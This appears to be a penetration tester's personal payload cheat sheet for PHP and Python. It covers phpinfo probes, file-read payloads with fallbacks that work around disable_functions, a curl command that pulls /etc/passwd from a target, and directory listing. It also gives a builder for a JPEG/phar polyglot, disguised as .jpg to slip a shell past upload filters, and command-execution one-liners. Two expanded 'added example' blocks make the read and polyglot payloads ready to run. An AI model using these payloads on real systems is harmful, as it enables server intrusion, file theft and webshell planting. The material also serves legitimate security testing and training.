Exploitation Payloads
PayloadsAllTheThings is the way to go, but I noted down some of mine.
PHP
PHP Info POC
We often run phpinfo() first to learn about the target's PHP configuration (version, loaded extensions, disable_functions, open_basedir, and so on):
<?php phpinfo() ?>
Read a file
There are multiple functions you might use:
<?php
// These are alternatives; each one reads index.php on its own
$fileContents = file_get_contents('index.php');     // raw bytes of the file
$fileContents = show_source('index.php', true);     // alias of highlight_file()
$fileContents = highlight_file('index.php', true);  // returns HTML-escaped, syntax-highlighted source instead of printing it
echo $fileContents;

// readfile() prints the file itself and returns the number of bytes written, so do not echo its return value
readfile('index.php');
?>
When the raw contents are echoed into a page, a browser treats anything between <?php and ?> as markup and hides it, so base64-encode the result before echoing. This is not needed with show_source / highlight_file, whose output is already HTML-escaped.
$fileContents = base64_encode($fileContents);
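A worked read payload tying the points above together, added here as an example (it is not code from the original notes): it tries the read primitives in turn, so something still comes back when one of them is listed in disable_functions, and base64-encodes the output so the browser cannot swallow the PHP tags. The script name read.php and the f parameter are assumptions.

```php
<?php
// Added example, not part of the original notes: read.php?f=<path>
// Tries the read primitives from the section above in turn, so the payload
// still returns something when one of them is blocked by disable_functions,
// and base64-encodes the result so a browser cannot hide <?php ... ?> blocks
// or render the markup. The script name and the "f" parameter are assumptions.

function read_file_any(string $path): ?string
{
    // Raw bytes, simplest when allowed
    if (function_exists('file_get_contents')) {
        $data = @file_get_contents($path);
        if ($data !== false) {
            return $data;
        }
    }

    // readfile() writes to the output stream, so capture it with an output buffer
    if (function_exists('readfile')) {
        ob_start();
        $written = @readfile($path);
        $data = ob_get_clean();
        if ($written !== false) {
            return $data;
        }
    }

    // Plain stream functions are rarely on a deny list
    if (function_exists('fopen')) {
        $fp = @fopen($path, 'rb');
        if ($fp !== false) {
            $data = stream_get_contents($fp);
            fclose($fp);
            return $data === false ? null : $data;
        }
    }

    // Last resort: highlight_file() returns HTML-escaped, syntax-highlighted
    // source; still readable after base64 decoding, just wrapped in markup
    if (function_exists('highlight_file')) {
        $html = @highlight_file($path, true);
        if ($html !== false) {
            return $html;
        }
    }

    return null;
}

$path = $_GET['f'] ?? 'index.php';
$content = read_file_any($path);

header('Content-Type: text/plain');
echo $content === null ? "read failed\n" : base64_encode($content) . "\n";
```

On the attacker side the response is decoded with something like `curl -s 'http://target/read.php?f=/etc/passwd' | base64 -d`. The order of the fallbacks is deliberate: the raw readers come first so the decoded output is the exact file, and highlight_file() is last because its output carries HTML around the source.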
Execute Shell Commands
Refer to webshells#php.
List files in directory
A few different ways to achieve the same output:
<?php
// 1. scandir() returns the whole listing as an array
var_dump(scandir("."));
$files = scandir(".");
foreach ($files as $file) {
    echo $file, "\n";
}

// 2. dir() returns a Directory object; compare against false explicitly,
//    otherwise an entry named "0" would end the loop early
$dir = dir('.');
while (($f = $dir->read()) !== false) {
    echo $f, "\n";
}
$dir->close();

// 3. opendir()/readdir() procedural style, same caveat on the comparison
$dir = opendir(".");
while (($f = readdir($dir)) !== false) {
    echo $f, "\n";
}
closedir($dir);
Phar
The phar:// stream wrapper also understands zip and tar archives, so simply zipping the PHP file may be enough. Otherwise, build a real phar (phar.readonly must be disabled for the build, hence the --define flag):
<?php // Run 'php --define phar.readonly=0 gen.php'
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.php', '<?php /*code*/ ?>');
// or: $phar->addFile('shell.php', 'shell.php');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
shell.php is the file inside the archive, i.e. the member name that goes after phar://shell.phar/.
To create a polyglot phar that also passes a magic-byte check (for example a JPEG, which starts with \xff\xd8 and ends with \xff\xd9), put the marker bytes in front of the stub. Phar only requires that the stub contain __HALT_COMPILER();, so the leading bytes are ignored by PHP:
<?php // php --define phar.readonly=0 gen.php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.php', '<?php /*code*/ ?>');
$phar->setStub("\xff\xd8\xff\xd9\n<?php __HALT_COMPILER(); ?>");
$phar->stopBuffering();
For reference, the member is then loaded with: include 'phar://./shell.phar/shell.php';
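A worked version of the generator above, added here as an example (it is not code from the original notes): it builds the JPEG polyglot, renames it so an extension filter is satisfied as well, and checks that the member is still reachable through phar:// under the new name. The file names and the placeholder member body are assumptions.

```php
<?php
// Added example, not from the original notes. Run with:
//   php -d phar.readonly=0 build_polyglot.php
// Builds the JPEG/phar polyglot from the section above, renames it to .jpg
// so an extension filter is satisfied too, and checks that the member is
// still reachable through the phar:// wrapper. File names are assumptions;
// the member only echoes a string instead of carrying a real shell.

$archive   = __DIR__ . '/shell.phar';
$disguised = __DIR__ . '/shell.jpg';
$payload   = '<?php echo "loaded from phar\n"; ?>';

// The Phar class insists on a recognised extension such as .phar when
// creating the archive, hence the two-step build-then-rename.
if (file_exists($archive)) {
    unlink($archive);
}
$phar = new Phar($archive);
$phar->startBuffering();
$phar->addFromString('shell.php', $payload);
// JPEG SOI (ff d8) and EOI (ff d9) markers, then the stub Phar requires.
// Anything may precede __HALT_COMPILER(); only its presence is checked.
$phar->setStub("\xff\xd8\xff\xd9\n<?php __HALT_COMPILER(); ?>");
$phar->stopBuffering();
unset($phar);

// The phar:// stream wrapper identifies the archive by content, not by name,
// so the file can carry whatever extension the upload filter expects.
rename($archive, $disguised);

// Check 1: the first bytes are the JPEG magic a content sniffer looks for.
$magic = file_get_contents($disguised, false, null, 0, 4);
printf("magic bytes: %s\n", bin2hex($magic));

// Check 2: the member is readable from the renamed archive.
$member = file_get_contents("phar://$disguised/shell.php");
printf("member intact: %s\n", $member === $payload ? 'yes' : 'no');

// Check 3: including it executes the code stored in the archive.
include "phar://$disguised/shell.php";
```

The rename step is the part worth remembering: the Phar class refuses to create an archive without a phar extension, but once the file exists the wrapper detects the format from the stub, so shell.jpg, shell.png or any other name works with include 'phar://./shell.jpg/shell.php'.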
Python
Simple Python one-liners to run a command:
# os.system() runs the command and prints its output directly; the return value is the exit status
import os;os.system('ls -1a');
# os.popen() returns a file-like handle; .read() returns the output as a string
import os;print(os.popen("ls -1a").read());
# subprocess.run() with an argument list avoids the shell; output goes straight to stdout
import subprocess; subprocess.run(['ls', '-1a']);
# shell=True when shell features (pipes, globs) are needed; capture the output as text
import subprocess;print(subprocess.run("whoami", shell=True, stdout=subprocess.PIPE, text=True).stdout)